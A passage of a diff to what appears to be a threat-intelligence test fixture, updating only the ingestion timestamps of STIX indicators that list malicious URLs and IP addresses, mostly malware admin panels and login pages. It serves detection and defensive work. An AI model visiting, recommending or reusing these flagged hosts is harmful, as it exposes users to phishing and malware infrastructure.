CyberCrime\",\"id\":\"indicator--e3177515-f481-46c8-bad8-582ba0858ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:57:56.007Z\",\"name\":\"mal_url: http://insuncos.com/files1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:56.007Z\"}", "category": "threat", "type": "indicator", 
@@ -4489,7 +4489,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023085300Z", + "ingested": "2021-12-14T14:57:43.118194550Z", "original": "{\"created\":\"2020-01-25T02:57:56.044Z\",\"description\":\"TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--33cdeaeb-5201-4fbb-b9ae-9c23377e7533\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:57:56.044Z\",\"name\":\"mal_url: http://tg-h.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tg-h.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:56.044Z\"}", "category": "threat", "type": "indicator", @@ -4541,7 +4541,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023090500Z", + "ingested": "2021-12-14T14:57:43.118195076Z", "original": "{\"created\":\"2020-01-25T02:58:11.038Z\",\"description\":\"TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--2baaa5f0-c2f6-4bd1-b59d-3a75931da735\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-25T02:58:11.038Z\",\"name\":\"mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:11.038Z\"}", "category": "threat", "type": "indicator", 
@@ -4592,7 +4592,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023095100Z", + "ingested": "2021-12-14T14:57:43.118195528Z", "original": "{\"created\":\"2020-01-25T02:58:20.42Z\",\"description\":\"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-25T02:58:20.42Z\",\"name\":\"mal_url: http://89.160.20.156/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.42Z\"}", "category": "threat", "type": "indicator", @@ -4644,7 +4644,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023100500Z", + "ingested": "2021-12-14T14:57:43.118195927Z", "original": "{\"created\":\"2020-01-25T02:58:20.448Z\",\"description\":\"TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--a173f4b1-67ce-44f8-a6d0-bd8a24e8c593\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-25T02:58:20.448Z\",\"name\":\"mal_url: http://topik07.mcdir.ru/papka/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://topik07.mcdir.ru/papka/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.448Z\"}", "category": "threat", "type": "indicator", 
@@ -4696,7 +4696,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023105800Z", + "ingested": "2021-12-14T14:57:43.118196322Z", "original": "{\"created\":\"2020-01-25T02:58:33.189Z\",\"description\":\"TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b53dded1-d293-4cd1-9e63-b6e0cbd850f0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:58:33.189Z\",\"name\":\"mal_url: http://insuncos.com/files2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:33.189Z\"}", "category": "threat", "type": "indicator", @@ -4747,7 +4747,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023110400Z", + "ingested": "2021-12-14T14:57:43.118196759Z", "original": "{\"created\":\"2020-01-25T02:58:49.056Z\",\"description\":\"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-01-25T02:58:49.056Z\",\"name\":\"mal_url: http://89.160.20.156/kaspersky/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/kaspersky/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:49.056Z\"}", "category": "threat", "type": "indicator", 
@@ -4799,7 +4799,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023116100Z", + "ingested": "2021-12-14T14:57:43.118197211Z", "original": "{\"created\":\"2020-01-25T02:58:59.472Z\",\"description\":\"TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--f502199a-17a4-404b-a114-fb5eda28c32c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:58:59.472Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:59.472Z\"}", "category": "threat", "type": "indicator", @@ -4851,7 +4851,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023123700Z", + "ingested": "2021-12-14T14:57:43.118197719Z", "original": "{\"created\":\"2020-01-25T02:59:27.07Z\",\"description\":\"TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--af7422eb-5d8e-4878-bdd1-395313434dae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:59:27.07Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:27.07Z\"}", "category": "threat", "type": "indicator", 
@@ -4903,7 +4903,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023131300Z", + "ingested": "2021-12-14T14:57:43.118198333Z", "original": "{\"created\":\"2020-01-25T02:59:28.967Z\",\"description\":\"TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--71b36c05-86dd-4685-81c0-5a99e2e14c23\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:59:28.967Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:28.967Z\"}", "category": "threat", "type": "indicator", @@ -4955,7 +4955,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023136900Z", + "ingested": "2021-12-14T14:57:43.118198770Z", "original": "{\"created\":\"2020-01-25T02:59:37.661Z\",\"description\":\"TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--9d948509-dfb4-45b6-b8bc-780df88a213f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-25T02:59:37.661Z\",\"name\":\"mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.661Z\"}", "category": "threat", "type": "indicator", 
@@ -5000,7 +5000,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023140500Z", + "ingested": "2021-12-14T14:57:43.118199292Z", "original": "{\"created\":\"2020-01-25T02:59:37.692Z\",\"description\":\"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--9f613f8e-2040-4eee-8044-044023a8093e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-25T02:59:37.692Z\",\"name\":\"mal_ip: 192.168.118.56\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.118.56']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.692Z\"}", "category": "threat", "type": "indicator", @@ -5052,7 +5052,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023144500Z", + "ingested": "2021-12-14T14:57:43.118199736Z", "original": "{\"created\":\"2020-01-25T02:59:54.296Z\",\"description\":\"TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--518c3959-6c26-413f-9a5f-c8f76d86185a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:59:54.296Z\",\"name\":\"mal_url: http://insuncos.com/files3/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files3/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:54.296Z\"}", "category": "threat", "type": "indicator", 
@@ -5103,7 +5103,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023149600Z", + "ingested": "2021-12-14T14:57:43.118200126Z", "original": "{\"created\":\"2020-01-25T02:59:57.748Z\",\"description\":\"TS ID: 55253484347; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--625b94ec-2304-4502-a2eb-59d52cdb9c1f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-25T02:59:57.748Z\",\"name\":\"mal_url: http://t95212tt.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://t95212tt.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:57.748Z\"}", "category": "threat", "type": "indicator", @@ -5154,7 +5154,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023155200Z", + "ingested": "2021-12-14T14:57:43.118200745Z", "original": "{\"created\":\"2020-01-25T03:00:22.168Z\",\"description\":\"TS ID: 55253484349; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--c8f76b97-051f-4fab-b57f-a57f37480aa0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T03:00:22.168Z\",\"name\":\"mal_url: http://kiototan.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kiototan.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:22.168Z\"}", "category": "threat", "type": "indicator", 
@@ -5199,7 +5199,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023159400Z", + "ingested": "2021-12-14T14:57:43.118201224Z", "original": "{\"created\":\"2020-01-25T03:00:27.279Z\",\"description\":\"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-25T03:00:27.279Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:27.279Z\"}", "category": "threat", "type": "indicator", @@ -5250,7 +5250,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023165800Z", + "ingested": "2021-12-14T14:57:43.118201619Z", "original": "{\"created\":\"2020-01-25T03:00:29.248Z\",\"description\":\"TS ID: 55253484340; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--72334129-8d1c-4cac-bde6-2d5d6316e266\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-25T03:00:29.248Z\",\"name\":\"mal_url: http://newfoundfriend.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://newfoundfriend.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:29.248Z\"}", "category": "threat", "type": "indicator", 
@@ -5302,7 +5302,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023170Z", + "ingested": "2021-12-14T14:57:43.118202066Z", "original": "{\"created\":\"2020-01-25T03:01:03.628Z\",\"description\":\"TS ID: 55253484360; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--a3f8f1e3-77c5-442d-a918-5d3d800a8357\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T03:01:03.628Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/bi/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/bi/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:01:03.628Z\"}", "category": "threat", "type": "indicator", @@ -5354,7 +5354,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023174400Z", + "ingested": "2021-12-14T14:57:43.118202628Z", "original": "{\"created\":\"2020-01-25T03:01:03.65Z\",\"description\":\"TS ID: 55253484355; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--49bac194-cefe-4c31-81eb-cc81a3a3bb26\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T03:01:03.65Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/vic/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/vic/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:01:03.65Z\"}", "category": "threat", "type": "indicator", 
@@ -5405,7 +5405,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023178Z", + "ingested": "2021-12-14T14:57:43.118203092Z", "original": "{\"created\":\"2020-01-26T02:54:41.651Z\",\"description\":\"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:54:41.651Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.651Z\"}", "category": "threat", "type": "indicator", @@ -5456,7 +5456,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023183300Z", + "ingested": "2021-12-14T14:57:43.118203558Z", "original": "{\"created\":\"2020-01-26T02:54:41.675Z\",\"description\":\"TS ID: 55256890149; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--3e082be1-f6be-45f6-811b-5e63e2a596c5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-26T02:54:41.675Z\",\"name\":\"mal_url: http://privatepp.club/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://privatepp.club/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.675Z\"}", "category": "threat", "type": "indicator", 
@@ -5507,7 +5507,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023208700Z", + "ingested": "2021-12-14T14:57:43.118203944Z", "original": "{\"created\":\"2020-01-26T02:54:41.705Z\",\"description\":\"TS ID: 55256890147; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--95774d83-e0e1-45e4-ab1c-1bb27588fa92\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-26T02:54:41.705Z\",\"name\":\"mal_url: http://109.94.208.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://109.94.208.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.705Z\"}", "category": "threat", "type": "indicator", @@ -5559,7 +5559,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023213Z", + "ingested": "2021-12-14T14:57:43.118204501Z", "original": "{\"created\":\"2020-01-26T02:55:15.583Z\",\"description\":\"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-01-26T02:55:15.583Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.583Z\"}", "category": "threat", "type": "indicator", 
@@ -5611,7 +5611,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023216400Z", + "ingested": "2021-12-14T14:57:43.118205083Z", "original": "{\"created\":\"2020-01-26T02:55:15.785Z\",\"description\":\"TS ID: 55256890140; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--751f6e49-92d5-4ff4-9245-870a49dce478\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:15.785Z\",\"name\":\"mal_url: http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.785Z\"}", "category": "threat", "type": "indicator", @@ -5662,7 +5662,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023220500Z", + "ingested": "2021-12-14T14:57:43.118205513Z", "original": "{\"created\":\"2020-01-26T02:55:22.112Z\",\"description\":\"TS ID: 55256890166; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e0bdcebe-2f97-4f8f-ad51-0b0c06b5071c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:22.112Z\",\"name\":\"mal_url: http://pecunia110011.at/iteat/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pecunia110011.at/iteat/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:22.112Z\"}", "category": "threat", "type": "indicator", 
@@ -5713,7 +5713,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023224100Z", + "ingested": "2021-12-14T14:57:43.118206196Z", "original": "{\"created\":\"2020-01-26T02:55:31.348Z\",\"description\":\"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime\",\"id\":\"indicator--82f02b81-cfae-4bee-b85d-daf900c93936\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-26T02:55:31.348Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:31.348Z\"}", "category": "threat", "type": "indicator", @@ -5764,7 +5764,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023229400Z", + "ingested": "2021-12-14T14:57:43.118206631Z", "original": "{\"created\":\"2020-01-26T02:55:32.119Z\",\"description\":\"TS ID: 55256890158; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--1e540e5a-6fa3-4758-ab61-0d7692fb3d96\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:32.119Z\",\"name\":\"mal_url: http://jor1.berbagsansa.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jor1.berbagsansa.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:32.119Z\"}", "category": "threat", "type": "indicator", 
@@ -5815,7 +5815,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023233500Z", + "ingested": "2021-12-14T14:57:43.118207029Z", "original": "{\"created\":\"2020-01-26T02:55:33.623Z\",\"description\":\"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-01-26T02:55:33.623Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.623Z\"}", "category": "threat", "type": "indicator", @@ -5866,7 +5866,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023237200Z", + "ingested": "2021-12-14T14:57:43.118207529Z", "original": "{\"created\":\"2020-01-26T02:55:33.646Z\",\"description\":\"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-26T02:55:33.646Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.646Z\"}", "category": "threat", "type": "indicator", 
@@ -5917,7 +5917,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023240600Z", + "ingested": "2021-12-14T14:57:43.118207961Z", "original": "{\"created\":\"2020-01-26T02:55:33.681Z\",\"description\":\"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6e4e6382-002d-473a-a635-cc00d4917353\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-26T02:55:33.681Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.681Z\"}", "category": "threat", "type": "indicator", @@ -5969,7 +5969,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023244200Z", + "ingested": "2021-12-14T14:57:43.118208354Z", "original": "{\"created\":\"2020-01-26T02:55:33.738Z\",\"description\":\"TS ID: 55256890138; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--33552aa0-5a5a-47a6-b529-a810dcf8c9af\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-01-26T02:55:33.738Z\",\"name\":\"mal_url: http://aboutworld.info/manage/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aboutworld.info/manage/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.738Z\"}", "category": "threat", "type": "indicator", 
@@ -6020,7 +6020,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023248500Z", + "ingested": "2021-12-14T14:57:43.118208760Z", "original": "{\"created\":\"2020-01-26T02:55:33.959Z\",\"description\":\"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--cd8459e5-367f-46b2-91e7-9893c766091a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:33.959Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.959Z\"}", "category": "threat", "type": "indicator", @@ -6071,7 +6071,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023253200Z", + "ingested": "2021-12-14T14:57:43.118209196Z", "original": "{\"created\":\"2020-01-26T02:55:33.984Z\",\"description\":\"TS ID: 55256890128; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--274a9145-93f7-4146-a879-68fce2fc1188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:55:33.984Z\",\"name\":\"mal_url: http://10121.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10121.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.984Z\"}", "category": "threat", "type": "indicator", 
